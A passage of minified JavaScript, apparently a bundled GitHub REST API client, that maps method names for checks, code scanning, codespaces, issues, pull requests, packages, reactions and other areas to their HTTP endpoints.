/user/installations/{installation_id}/repositories/{repository_id}"],resetToken:["PATCH /applications/{client_id}/token"],revokeInstallationAccessToken:["DELETE /installation/token"],scopeToken:["POST /applications/{client_id}/token/scoped"],suspendInstallation:["PUT /app/installations/{installation_id}/suspended"],unsuspendInstallation:["DELETE /app/installations/{installation_id}/suspended"],updateWebhookConfigForApp:["PATCH /app/hook/config"]},billing:{getGithubActionsBillingOrg:["GET /orgs/{org}/settings/billing/actions"],getGithubActionsBillingUser:["GET /users/{username}/settings/billing/actions"],getGithubAdvancedSecurityBillingGhe:["GET /enterprises/{enterprise}/settings/billing/advanced-security"],getGithubAdvancedSecurityBillingOrg:["GET /orgs/{org}/settings/billing/advanced-security"],getGithubPackagesBillingOrg:["GET /orgs/{org}/settings/billing/packages"],getGithubPackagesBillingUser:["GET /users/{username}/settings/billing/packages"],getSharedStorageBillingOrg:["GET /orgs/{org}/settings/billing/shared-storage"],getSharedStorageBillingUser:["GET /users/{username}/settings/billing/shared-storage"]},checks:{create:["POST /repos/{owner}/{repo}/check-runs"],createSuite:["POST /repos/{owner}/{repo}/check-suites"],get:["GET /repos/{owner}/{repo}/check-runs/{check_run_id}"],getSuite:["GET /repos/{owner}/{repo}/check-suites/{check_suite_id}"],listAnnotations:["GET /repos/{owner}/{repo}/check-runs/{check_run_id}/annotations"],listForRef:["GET /repos/{owner}/{repo}/commits/{ref}/check-runs"],listForSuite:["GET /repos/{owner}/{repo}/check-suites/{check_suite_id}/check-runs"],listSuitesForRef:["GET /repos/{owner}/{repo}/commits/{ref}/check-suites"],rerequestRun:["POST /repos/{owner}/{repo}/check-runs/{check_run_id}/rerequest"],rerequestSuite:["POST /repos/{owner}/{repo}/check-suites/{check_suite_id}/rerequest"],setSuitesPreferences:["PATCH /repos/{owner}/{repo}/check-suites/preferences"],update:["PATCH /repos/{owner}/{repo}/check-runs/{check_run_id}"]},codeScanning:{deleteAnalysis:["DELETE /repos/{owner}/{repo}/code-scanning/analyses/{analysis_id}{?confirm_delete}"],getAlert:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}",{},{renamedParameters:{alert_id:"alert_number"}}],getAnalysis:["GET /repos/{owner}/{repo}/code-scanning/analyses/{analysis_id}"],getCodeqlDatabase:["GET /repos/{owner}/{repo}/code-scanning/codeql/databases/{language}"],getSarif:["GET /repos/{owner}/{repo}/code-scanning/sarifs/{sarif_id}"],listAlertInstances:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}/instances"],listAlertsForEnterprise:["GET /enterprises/{enterprise}/code-scanning/alerts"],listAlertsForOrg:["GET /orgs/{org}/code-scanning/alerts"],listAlertsForRepo:["GET /repos/{owner}/{repo}/code-scanning/alerts"],listAlertsInstances:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}/instances",{},{renamed:["codeScanning","listAlertInstances"]}],listCodeqlDatabases:["GET /repos/{owner}/{repo}/code-scanning/codeql/databases"],listRecentAnalyses:["GET /repos/{owner}/{repo}/code-scanning/analyses"],updateAlert:["PATCH /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}"],uploadSarif:["POST /repos/{owner}/{repo}/code-scanning/sarifs"]},codesOfConduct:{getAllCodesOfConduct:["GET /codes_of_conduct"],getConductCode:["GET /codes_of_conduct/{key}"]},codespaces:{addRepositoryForSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}/repositories/{repository_id}"],addSelectedRepoToOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}/repositories/{repository_id}"],codespaceMachinesForAuthenticatedUser:["GET /user/codespaces/{codespace_name}/machines"],createForAuthenticatedUser:["POST /user/codespaces"],createOrUpdateOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],createOrUpdateSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}"],createWithPrForAuthenticatedUser:["POST /repos/{owner}/{repo}/pulls/{pull_number}/codespaces"],createWithRepoForAuthenticatedUser:["POST /repos/{owner}/{repo}/codespaces"],deleteForAuthenticatedUser:["DELETE /user/codespaces/{codespace_name}"],deleteFromOrganization:["DELETE /orgs/{org}/members/{username}/codespaces/{codespace_name}"],deleteOrgSecret:["DELETE /organizations/{org}/codespaces/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],deleteSecretForAuthenticatedUser:["DELETE /user/codespaces/secrets/{secret_name}"],exportForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/exports"],getExportDetailsForAuthenticatedUser:["GET /user/codespaces/{codespace_name}/exports/{export_id}"],getForAuthenticatedUser:["GET /user/codespaces/{codespace_name}"],getOrgPublicKey:["GET /organizations/{org}/codespaces/secrets/public-key"],getOrgSecret:["GET /organizations/{org}/codespaces/secrets/{secret_name}"],getPublicKeyForAuthenticatedUser:["GET /user/codespaces/secrets/public-key"],getRepoPublicKey:["GET /repos/{owner}/{repo}/codespaces/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],getSecretForAuthenticatedUser:["GET /user/codespaces/secrets/{secret_name}"],listDevcontainersInRepositoryForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/devcontainers"],listForAuthenticatedUser:["GET /user/codespaces"],listInOrganization:["GET /orgs/{org}/codespaces",{},{renamedParameters:{org_id:"org"}}],listInRepositoryForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces"],listOrgSecrets:["GET /organizations/{org}/codespaces/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/codespaces/secrets"],listRepositoriesForSecretForAuthenticatedUser:["GET /user/codespaces/secrets/{secret_name}/repositories"],listSecretsForAuthenticatedUser:["GET /user/codespaces/secrets"],listSelectedReposForOrgSecret:["GET /organizations/{org}/codespaces/secrets/{secret_name}/repositories"],preFlightWithRepoForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/new"],removeRepositoryForSecretForAuthenticatedUser:["DELETE /user/codespaces/secrets/{secret_name}/repositories/{repository_id}"],removeSelectedRepoFromOrgSecret:["DELETE /organizations/{org}/codespaces/secrets/{secret_name}/repositories/{repository_id}"],repoMachinesForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/machines"],setRepositoriesForSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}/repositories"],setSelectedReposForOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}/repositories"],startForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/start"],stopForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/stop"],stopInOrganization:["POST /orgs/{org}/members/{username}/codespaces/{codespace_name}/stop"],updateForAuthenticatedUser:["PATCH /user/codespaces/{codespace_name}"]},dependabot:{addSelectedRepoToOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}/repositories/{repository_id}"],createOrUpdateOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],deleteOrgSecret:["DELETE /orgs/{org}/dependabot/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],getAlert:["GET /repos/{owner}/{repo}/dependabot/alerts/{alert_number}"],getOrgPublicKey:["GET /orgs/{org}/dependabot/secrets/public-key"],getOrgSecret:["GET /orgs/{org}/dependabot/secrets/{secret_name}"],getRepoPublicKey:["GET /repos/{owner}/{repo}/dependabot/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],listAlertsForRepo:["GET /repos/{owner}/{repo}/dependabot/alerts"],listOrgSecrets:["GET /orgs/{org}/dependabot/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/dependabot/secrets"],listSelectedReposForOrgSecret:["GET /orgs/{org}/dependabot/secrets/{secret_name}/repositories"],removeSelectedRepoFromOrgSecret:["DELETE /orgs/{org}/dependabot/secrets/{secret_name}/repositories/{repository_id}"],setSelectedReposForOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}/repositories"],updateAlert:["PATCH /repos/{owner}/{repo}/dependabot/alerts/{alert_number}"]},dependencyGraph:{createRepositorySnapshot:["POST /repos/{owner}/{repo}/dependency-graph/snapshots"],diffRange:["GET /repos/{owner}/{repo}/dependency-graph/compare/{basehead}"]},emojis:{get:["GET /emojis"]},enterpriseAdmin:{addCustomLabelsToSelfHostedRunnerForEnterprise:["POST /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],disableSelectedOrganizationGithubActionsEnterprise:["DELETE /enterprises/{enterprise}/actions/permissions/organizations/{org_id}"],enableSelectedOrganizationGithubActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/organizations/{org_id}"],getAllowedActionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/selected-actions"],getGithubActionsPermissionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions"],getServerStatistics:["GET /enterprise-installation/{enterprise_or_org}/server-statistics"],listLabelsForSelfHostedRunnerForEnterprise:["GET /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],listSelectedOrganizationsEnabledGithubActionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/organizations"],removeAllCustomLabelsFromSelfHostedRunnerForEnterprise:["DELETE /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],removeCustomLabelFromSelfHostedRunnerForEnterprise:["DELETE /enterprises/{enterprise}/actions/runners/{runner_id}/labels/{name}"],setAllowedActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/selected-actions"],setCustomLabelsForSelfHostedRunnerForEnterprise:["PUT /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],setGithubActionsPermissionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions"],setSelectedOrganizationsEnabledGithubActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/organizations"]},gists:{checkIsStarred:["GET /gists/{gist_id}/star"],create:["POST /gists"],createComment:["POST /gists/{gist_id}/comments"],delete:["DELETE /gists/{gist_id}"],deleteComment:["DELETE /gists/{gist_id}/comments/{comment_id}"],fork:["POST /gists/{gist_id}/forks"],get:["GET /gists/{gist_id}"],getComment:["GET /gists/{gist_id}/comments/{comment_id}"],getRevision:["GET /gists/{gist_id}/{sha}"],list:["GET /gists"],listComments:["GET /gists/{gist_id}/comments"],listCommits:["GET /gists/{gist_id}/commits"],listForUser:["GET /users/{username}/gists"],listForks:["GET /gists/{gist_id}/forks"],listPublic:["GET /gists/public"],listStarred:["GET /gists/starred"],star:["PUT /gists/{gist_id}/star"],unstar:["DELETE /gists/{gist_id}/star"],update:["PATCH /gists/{gist_id}"],updateComment:["PATCH /gists/{gist_id}/comments/{comment_id}"]},git:{createBlob:["POST /repos/{owner}/{repo}/git/blobs"],createCommit:["POST /repos/{owner}/{repo}/git/commits"],createRef:["POST /repos/{owner}/{repo}/git/refs"],createTag:["POST /repos/{owner}/{repo}/git/tags"],createTree:["POST /repos/{owner}/{repo}/git/trees"],deleteRef:["DELETE /repos/{owner}/{repo}/git/refs/{ref}"],getBlob:["GET /repos/{owner}/{repo}/git/blobs/{file_sha}"],getCommit:["GET /repos/{owner}/{repo}/git/commits/{commit_sha}"],getRef:["GET /repos/{owner}/{repo}/git/ref/{ref}"],getTag:["GET /repos/{owner}/{repo}/git/tags/{tag_sha}"],getTree:["GET /repos/{owner}/{repo}/git/trees/{tree_sha}"],listMatchingRefs:["GET /repos/{owner}/{repo}/git/matching-refs/{ref}"],updateRef:["PATCH /repos/{owner}/{repo}/git/refs/{ref}"]},gitignore:{getAllTemplates:["GET /gitignore/templates"],getTemplate:["GET /gitignore/templates/{name}"]},interactions:{getRestrictionsForAuthenticatedUser:["GET /user/interaction-limits"],getRestrictionsForOrg:["GET /orgs/{org}/interaction-limits"],getRestrictionsForRepo:["GET /repos/{owner}/{repo}/interaction-limits"],getRestrictionsForYourPublicRepos:["GET /user/interaction-limits",{},{renamed:["interactions","getRestrictionsForAuthenticatedUser"]}],removeRestrictionsForAuthenticatedUser:["DELETE /user/interaction-limits"],removeRestrictionsForOrg:["DELETE /orgs/{org}/interaction-limits"],removeRestrictionsForRepo:["DELETE /repos/{owner}/{repo}/interaction-limits"],removeRestrictionsForYourPublicRepos:["DELETE /user/interaction-limits",{},{renamed:["interactions","removeRestrictionsForAuthenticatedUser"]}],setRestrictionsForAuthenticatedUser:["PUT /user/interaction-limits"],setRestrictionsForOrg:["PUT /orgs/{org}/interaction-limits"],setRestrictionsForRepo:["PUT /repos/{owner}/{repo}/interaction-limits"],setRestrictionsForYourPublicRepos:["PUT /user/interaction-limits",{},{renamed:["interactions","setRestrictionsForAuthenticatedUser"]}]},issues:{addAssignees:["POST /repos/{owner}/{repo}/issues/{issue_number}/assignees"],addLabels:["POST /repos/{owner}/{repo}/issues/{issue_number}/labels"],checkUserCanBeAssigned:["GET /repos/{owner}/{repo}/assignees/{assignee}"],create:["POST /repos/{owner}/{repo}/issues"],createComment:["POST /repos/{owner}/{repo}/issues/{issue_number}/comments"],createLabel:["POST /repos/{owner}/{repo}/labels"],createMilestone:["POST /repos/{owner}/{repo}/milestones"],deleteComment:["DELETE /repos/{owner}/{repo}/issues/comments/{comment_id}"],deleteLabel:["DELETE /repos/{owner}/{repo}/labels/{name}"],deleteMilestone:["DELETE /repos/{owner}/{repo}/milestones/{milestone_number}"],get:["GET /repos/{owner}/{repo}/issues/{issue_number}"],getComment:["GET /repos/{owner}/{repo}/issues/comments/{comment_id}"],getEvent:["GET /repos/{owner}/{repo}/issues/events/{event_id}"],getLabel:["GET /repos/{owner}/{repo}/labels/{name}"],getMilestone:["GET /repos/{owner}/{repo}/milestones/{milestone_number}"],list:["GET /issues"],listAssignees:["GET /repos/{owner}/{repo}/assignees"],listComments:["GET /repos/{owner}/{repo}/issues/{issue_number}/comments"],listCommentsForRepo:["GET /repos/{owner}/{repo}/issues/comments"],listEvents:["GET /repos/{owner}/{repo}/issues/{issue_number}/events"],listEventsForRepo:["GET /repos/{owner}/{repo}/issues/events"],listEventsForTimeline:["GET /repos/{owner}/{repo}/issues/{issue_number}/timeline"],listForAuthenticatedUser:["GET /user/issues"],listForOrg:["GET /orgs/{org}/issues"],listForRepo:["GET /repos/{owner}/{repo}/issues"],listLabelsForMilestone:["GET /repos/{owner}/{repo}/milestones/{milestone_number}/labels"],listLabelsForRepo:["GET /repos/{owner}/{repo}/labels"],listLabelsOnIssue:["GET /repos/{owner}/{repo}/issues/{issue_number}/labels"],listMilestones:["GET /repos/{owner}/{repo}/milestones"],lock:["PUT /repos/{owner}/{repo}/issues/{issue_number}/lock"],removeAllLabels:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/labels"],removeAssignees:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/assignees"],removeLabel:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/labels/{name}"],setLabels:["PUT /repos/{owner}/{repo}/issues/{issue_number}/labels"],unlock:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/lock"],update:["PATCH /repos/{owner}/{repo}/issues/{issue_number}"],updateComment:["PATCH /repos/{owner}/{repo}/issues/comments/{comment_id}"],updateLabel:["PATCH /repos/{owner}/{repo}/labels/{name}"],updateMilestone:["PATCH /repos/{owner}/{repo}/milestones/{milestone_number}"]},licenses:{get:["GET /licenses/{license}"],getAllCommonlyUsed:["GET /licenses"],getForRepo:["GET /repos/{owner}/{repo}/license"]},markdown:{render:["POST /markdown"],renderRaw:["POST /markdown/raw",{headers:{"content-type":"text/plain; charset=utf-8"}}]},meta:{get:["GET /meta"],getOctocat:["GET /octocat"],getZen:["GET /zen"],root:["GET /"]},migrations:{cancelImport:["DELETE /repos/{owner}/{repo}/import"],deleteArchiveForAuthenticatedUser:["DELETE /user/migrations/{migration_id}/archive"],deleteArchiveForOrg:["DELETE /orgs/{org}/migrations/{migration_id}/archive"],downloadArchiveForOrg:["GET /orgs/{org}/migrations/{migration_id}/archive"],getArchiveForAuthenticatedUser:["GET /user/migrations/{migration_id}/archive"],getCommitAuthors:["GET /repos/{owner}/{repo}/import/authors"],getImportStatus:["GET /repos/{owner}/{repo}/import"],getLargeFiles:["GET /repos/{owner}/{repo}/import/large_files"],getStatusForAuthenticatedUser:["GET /user/migrations/{migration_id}"],getStatusForOrg:["GET /orgs/{org}/migrations/{migration_id}"],listForAuthenticatedUser:["GET /user/migrations"],listForOrg:["GET /orgs/{org}/migrations"],listReposForAuthenticatedUser:["GET /user/migrations/{migration_id}/repositories"],listReposForOrg:["GET /orgs/{org}/migrations/{migration_id}/repositories"],listReposForUser:["GET /user/migrations/{migration_id}/repositories",{},{renamed:["migrations","listReposForAuthenticatedUser"]}],mapCommitAuthor:["PATCH /repos/{owner}/{repo}/import/authors/{author_id}"],setLfsPreference:["PATCH /repos/{owner}/{repo}/import/lfs"],startForAuthenticatedUser:["POST /user/migrations"],startForOrg:["POST /orgs/{org}/migrations"],startImport:["PUT /repos/{owner}/{repo}/import"],unlockRepoForAuthenticatedUser:["DELETE /user/migrations/{migration_id}/repos/{repo_name}/lock"],unlockRepoForOrg:["DELETE /orgs/{org}/migrations/{migration_id}/repos/{repo_name}/lock"],updateImport:["PATCH /repos/{owner}/{repo}/import"]},orgs:{addSecurityManagerTeam:["PUT /orgs/{org}/security-managers/teams/{team_slug}"],blockUser:["PUT /orgs/{org}/blocks/{username}"],cancelInvitation:["DELETE /orgs/{org}/invitations/{invitation_id}"],checkBlockedUser:["GET /orgs/{org}/blocks/{username}"],checkMembershipForUser:["GET /orgs/{org}/members/{username}"],checkPublicMembershipForUser:["GET /orgs/{org}/public_members/{username}"],convertMemberToOutsideCollaborator:["PUT /orgs/{org}/outside_collaborators/{username}"],createCustomRole:["POST /orgs/{org}/custom_roles"],createInvitation:["POST /orgs/{org}/invitations"],createWebhook:["POST /orgs/{org}/hooks"],deleteCustomRole:["DELETE /orgs/{org}/custom_roles/{role_id}"],deleteWebhook:["DELETE /orgs/{org}/hooks/{hook_id}"],enableOrDisableSecurityProductOnAllOrgRepos:["POST /orgs/{org}/{security_product}/{enablement}"],get:["GET /orgs/{org}"],getMembershipForAuthenticatedUser:["GET /user/memberships/orgs/{org}"],getMembershipForUser:["GET /orgs/{org}/memberships/{username}"],getWebhook:["GET /orgs/{org}/hooks/{hook_id}"],getWebhookConfigForOrg:["GET /orgs/{org}/hooks/{hook_id}/config"],getWebhookDelivery:["GET /orgs/{org}/hooks/{hook_id}/deliveries/{delivery_id}"],list:["GET /organizations"],listAppInstallations:["GET /orgs/{org}/installations"],listBlockedUsers:["GET /orgs/{org}/blocks"],listCustomRoles:["GET /organizations/{organization_id}/custom_roles"],listFailedInvitations:["GET /orgs/{org}/failed_invitations"],listFineGrainedPermissions:["GET /orgs/{org}/fine_grained_permissions"],listForAuthenticatedUser:["GET /user/orgs"],listForUser:["GET /users/{username}/orgs"],listInvitationTeams:["GET /orgs/{org}/invitations/{invitation_id}/teams"],listMembers:["GET /orgs/{org}/members"],listMembershipsForAuthenticatedUser:["GET /user/memberships/orgs"],listOutsideCollaborators:["GET /orgs/{org}/outside_collaborators"],listPendingInvitations:["GET /orgs/{org}/invitations"],listPublicMembers:["GET /orgs/{org}/public_members"],listSecurityManagerTeams:["GET /orgs/{org}/security-managers"],listWebhookDeliveries:["GET /orgs/{org}/hooks/{hook_id}/deliveries"],listWebhooks:["GET /orgs/{org}/hooks"],pingWebhook:["POST /orgs/{org}/hooks/{hook_id}/pings"],redeliverWebhookDelivery:["POST /orgs/{org}/hooks/{hook_id}/deliveries/{delivery_id}/attempts"],removeMember:["DELETE /orgs/{org}/members/{username}"],removeMembershipForUser:["DELETE /orgs/{org}/memberships/{username}"],removeOutsideCollaborator:["DELETE /orgs/{org}/outside_collaborators/{username}"],removePublicMembershipForAuthenticatedUser:["DELETE /orgs/{org}/public_members/{username}"],removeSecurityManagerTeam:["DELETE /orgs/{org}/security-managers/teams/{team_slug}"],setMembershipForUser:["PUT /orgs/{org}/memberships/{username}"],setPublicMembershipForAuthenticatedUser:["PUT /orgs/{org}/public_members/{username}"],unblockUser:["DELETE /orgs/{org}/blocks/{username}"],update:["PATCH /orgs/{org}"],updateCustomRole:["PATCH /orgs/{org}/custom_roles/{role_id}"],updateMembershipForAuthenticatedUser:["PATCH /user/memberships/orgs/{org}"],updateWebhook:["PATCH /orgs/{org}/hooks/{hook_id}"],updateWebhookConfigForOrg:["PATCH /orgs/{org}/hooks/{hook_id}/config"]},packages:{deletePackageForAuthenticatedUser:["DELETE /user/packages/{package_type}/{package_name}"],deletePackageForOrg:["DELETE /orgs/{org}/packages/{package_type}/{package_name}"],deletePackageForUser:["DELETE /users/{username}/packages/{package_type}/{package_name}"],deletePackageVersionForAuthenticatedUser:["DELETE /user/packages/{package_type}/{package_name}/versions/{package_version_id}"],deletePackageVersionForOrg:["DELETE /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}"],deletePackageVersionForUser:["DELETE /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}"],getAllPackageVersionsForAPackageOwnedByAnOrg:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions",{},{renamed:["packages","getAllPackageVersionsForPackageOwnedByOrg"]}],getAllPackageVersionsForAPackageOwnedByTheAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions",{},{renamed:["packages","getAllPackageVersionsForPackageOwnedByAuthenticatedUser"]}],getAllPackageVersionsForPackageOwnedByAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions"],getAllPackageVersionsForPackageOwnedByOrg:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions"],getAllPackageVersionsForPackageOwnedByUser:["GET /users/{username}/packages/{package_type}/{package_name}/versions"],getPackageForAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}"],getPackageForOrganization:["GET /orgs/{org}/packages/{package_type}/{package_name}"],getPackageForUser:["GET /users/{username}/packages/{package_type}/{package_name}"],getPackageVersionForAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions/{package_version_id}"],getPackageVersionForOrganization:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}"],getPackageVersionForUser:["GET /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}"],listPackagesForAuthenticatedUser:["GET /user/packages"],listPackagesForOrganization:["GET /orgs/{org}/packages"],listPackagesForUser:["GET /users/{username}/packages"],restorePackageForAuthenticatedUser:["POST /user/packages/{package_type}/{package_name}/restore{?token}"],restorePackageForOrg:["POST /orgs/{org}/packages/{package_type}/{package_name}/restore{?token}"],restorePackageForUser:["POST /users/{username}/packages/{package_type}/{package_name}/restore{?token}"],restorePackageVersionForAuthenticatedUser:["POST /user/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"],restorePackageVersionForOrg:["POST /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"],restorePackageVersionForUser:["POST /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"]},projects:{addCollaborator:["PUT /projects/{project_id}/collaborators/{username}"],createCard:["POST /projects/columns/{column_id}/cards"],createColumn:["POST /projects/{project_id}/columns"],createForAuthenticatedUser:["POST /user/projects"],createForOrg:["POST /orgs/{org}/projects"],createForRepo:["POST /repos/{owner}/{repo}/projects"],delete:["DELETE /projects/{project_id}"],deleteCard:["DELETE /projects/columns/cards/{card_id}"],deleteColumn:["DELETE /projects/columns/{column_id}"],get:["GET /projects/{project_id}"],getCard:["GET /projects/columns/cards/{card_id}"],getColumn:["GET /projects/columns/{column_id}"],getPermissionForUser:["GET /projects/{project_id}/collaborators/{username}/permission"],listCards:["GET /projects/columns/{column_id}/cards"],listCollaborators:["GET /projects/{project_id}/collaborators"],listColumns:["GET /projects/{project_id}/columns"],listForOrg:["GET /orgs/{org}/projects"],listForRepo:["GET /repos/{owner}/{repo}/projects"],listForUser:["GET /users/{username}/projects"],moveCard:["POST /projects/columns/cards/{card_id}/moves"],moveColumn:["POST /projects/columns/{column_id}/moves"],removeCollaborator:["DELETE /projects/{project_id}/collaborators/{username}"],update:["PATCH /projects/{project_id}"],updateCard:["PATCH /projects/columns/cards/{card_id}"],updateColumn:["PATCH /projects/columns/{column_id}"]},pulls:{checkIfMerged:["GET /repos/{owner}/{repo}/pulls/{pull_number}/merge"],create:["POST /repos/{owner}/{repo}/pulls"],createReplyForReviewComment:["POST /repos/{owner}/{repo}/pulls/{pull_number}/comments/{comment_id}/replies"],createReview:["POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews"],createReviewComment:["POST /repos/{owner}/{repo}/pulls/{pull_number}/comments"],deletePendingReview:["DELETE /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],deleteReviewComment:["DELETE /repos/{owner}/{repo}/pulls/comments/{comment_id}"],dismissReview:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/dismissals"],get:["GET /repos/{owner}/{repo}/pulls/{pull_number}"],getReview:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],getReviewComment:["GET /repos/{owner}/{repo}/pulls/comments/{comment_id}"],list:["GET /repos/{owner}/{repo}/pulls"],listCommentsForReview:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/comments"],listCommits:["GET /repos/{owner}/{repo}/pulls/{pull_number}/commits"],listFiles:["GET /repos/{owner}/{repo}/pulls/{pull_number}/files"],listRequestedReviewers:["GET /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],listReviewComments:["GET /repos/{owner}/{repo}/pulls/{pull_number}/comments"],listReviewCommentsForRepo:["GET /repos/{owner}/{repo}/pulls/comments"],listReviews:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews"],merge:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/merge"],removeRequestedReviewers:["DELETE /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],requestReviewers:["POST /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],submitReview:["POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/events"],update:["PATCH /repos/{owner}/{repo}/pulls/{pull_number}"],updateBranch:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/update-branch"],updateReview:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],updateReviewComment:["PATCH /repos/{owner}/{repo}/pulls/comments/{comment_id}"]},rateLimit:{get:["GET /rate_limit"]},reactions:{createForCommitComment:["POST /repos/{owner}/{repo}/comments/{comment_id}/reactions"],createForIssue:["POST /repos/{owner}/{repo}/issues/{issue_number}/reactions"],createForIssueComment:["POST /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions"],createForPullRequestReviewComment:["POST /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions"],createForRelease:["POST /repos/{owner}/{repo}/releases/{release_id}/reactions"],createForTeamDiscussionCommentInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions"],createForTeamDiscussionInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions"],deleteForCommitComment:["DELETE /repos/{owner}/{repo}/comments/{comment_id}/reactions/{reaction_id}"],deleteForIssue:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/reactions/{reaction_id}"],deleteForIssueComment:["DELETE /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions/{reaction_id}"],deleteForPullRequestComment:["DELETE /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions/{reaction_id}"],deleteForRelease:["DELETE /repos/{owner}/{repo}/releases/{release_id}/reactions/{reaction_id}"],deleteForTeamDiscussion:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions/{reaction_id}"],deleteForTeamDiscussionComment:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions/{reaction_id}"],listForCommitComment:["GET /repos/{owner}/{repo}/comments/{comment_id}/reactions"],listForIssue:["GET /repos/{owner}/{repo}/issues/{issue_number}/reactions"],listForIssueComment:["GET /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions"],listForPullRequestReviewComment:["GET /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions"],listForRelease:["GET /repos/{owner}/{repo}/releases/{release_id}/reactions"],listForTeamDiscussionCommentInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions"],listForTeamDiscussionInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions"]},repos:{acceptInvitation:["PATCH /user/repository_invitations/{invitation_id}",{},{renamed:["repos","acceptInvitationForAuthenticatedUser"]}],acceptInvitationForAuthenticatedUser:["PATCH /user/repository_invitations/{invitation_id}"],addAppAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],addCollaborator:["PUT /repos/{owner}/{repo}/collaborators/{username}"],addStatusCheckContexts:["POST /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],addTeamAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],addUserAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],checkCollaborator:["GET /repos/{owner}/{repo}/collaborators/{username}"],checkVulnerabilityAlerts:["GET /repos/{owner}/{repo}/vulnerability-alerts"],codeownersErrors:["GET /repos/{owner}/{repo}/codeowners/errors"],compareCommits:["GET 